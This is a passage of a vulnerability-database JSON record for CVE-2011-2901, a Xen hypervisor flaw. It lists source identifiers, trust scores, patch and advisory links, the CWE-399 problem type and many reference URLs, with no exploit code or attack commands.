http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6032\n[ 32 ] CVE-2012-6033\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6033\n[ 33 ] CVE-2012-6034\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6034\n[ 34 ] CVE-2012-6035\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6035\n[ 35 ] CVE-2012-6036\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6036\n[ 36 ] CVE-2012-6075\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6075\n[ 37 ] CVE-2012-6333\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6333\n[ 38 ] CVE-2013-0151\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0151\n[ 39 ] CVE-2013-0152\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0152\n[ 40 ] CVE-2013-0153\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0153\n[ 41 ] CVE-2013-0154\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0154\n[ 42 ] CVE-2013-0215\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0215\n[ 43 ] CVE-2013-1432\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1432\n[ 44 ] CVE-2013-1917\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1917\n[ 45 ] CVE-2013-1918\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1918\n[ 46 ] CVE-2013-1919\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1919\n[ 47 ] CVE-2013-1920\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1920\n[ 48 ] CVE-2013-1922\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1922\n[ 49 ] CVE-2013-1952\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1952\n[ 50 ] CVE-2013-1964\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1964\n[ 51 ] CVE-2013-2076\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2076\n[ 52 ] CVE-2013-2077\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2077\n[ 53 ] CVE-2013-2078\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2078\n[ 54 ] CVE-2013-2194\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2194\n[ 55 ] CVE-2013-2195\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2195\n[ 56 ] CVE-2013-2196\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2196\n[ 57 ] CVE-2013-2211\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2211\n[ 58 ] Xen TMEM\n       http://lists.xen.org/archives/html/xen-announce/2012-09/msg00006.h=\ntml\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201309-24.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2013 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "BID",
        "id": "49370"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "123421"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-2901",
        "trust": 3.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/09/02/2",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "55082",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "51749",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "49370",
        "trust": 0.3
      },
      {
        "db": "HITACHI",
        "id": "HS12-005",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "104843",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "107847",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "109299",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "123421",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "49370"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "123421"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "id": "VAR-201310-0084",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.225
  },
  "last_update_date": "2023-04-25T19:33:45.054000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 728042",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=728042"
      },
      {
        "title": "Xen Security Advisory 4 (CVE-2011-2901) - Xen 3.3 vaddr validation",
        "trust": 0.8,
        "url": "http://lists.xen.org/archives/html/xen-devel/2011-09/msg00119.html"
      },
      {
        "title": "Xen Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=234536"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=728042"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2011-1212.html"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-201309-24.xml"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2011/09/02/2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/55082"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2901"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2901"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/51749"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2011-2901"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2011:1813"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2011:1212"
      },
      {
        "trust": 0.3,
        "url": "http://wiki.openvz.org/download/kernel/rhel5/028stab094.3"
      },
      {
        "trust": 0.3,
        "url": "http://www.vmware.com/security/advisories/vmsa-2012-0001.html"
      },
      {
        "trust": 0.3,
        "url": "http://xen.xensource.com/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100151103"
      },
      {
        "trust": 0.3,
        "url": "http://support.citrix.com/article/ctx130325"
      },
      {
        "trust": 0.3,
        "url": "http://www.hds.com/products/storage-software/hitachi-device-manager.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2901"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2901.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/kb/docs/doc-11259"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2517"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2495"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2491"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2495.html"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2482"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2482.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2519"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2519.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2491.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2517.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.2,
        "url": "http://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/5/html/5.7_technical_notes/kernel.html#rhsa-2011-1212"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1813.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0711"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2522"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1780"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2525"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1746"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2192"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4649"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4649"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1078"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1170"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1745"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1936"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/go/selfsupport-download"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2519"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009143"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1763"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2482"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1078"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0711"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1171"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1079"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1577"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1172"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1172"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0726"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1678"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1080"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0695"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2517"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1079"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009142"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2022"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1593"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1170"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2694"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3378"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1171"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6075"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4536"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2196"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5634"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1952"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2211"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4535"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2195"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2077"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4535"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6030"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1920"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4538"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0152"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5514"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6036"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3433"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5525"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3497"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2078"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4536"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3495"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6031"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0217"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4537"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2194"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3262"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5511"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4411"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4538"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2934"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3495"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5510"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3433"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4539"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3494"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0153"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2076"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3432"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5515"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6033"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-2934"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4537"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5634"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2901"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5514"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6035"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6032"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3515"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5512"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1917"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0218"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3498"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1432"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3432"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1964"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3262"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3498"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0154"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3497"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5515"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0215"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5513"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5513"
      },
      {
        "trust": 0.1,
        "url": "http://lists.xen.org/archives/html/xen-announce/2012-09/msg00006.h="
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0218"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5525"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4411"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-6034"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4539"
      },
      {
        "trust": 0.1,
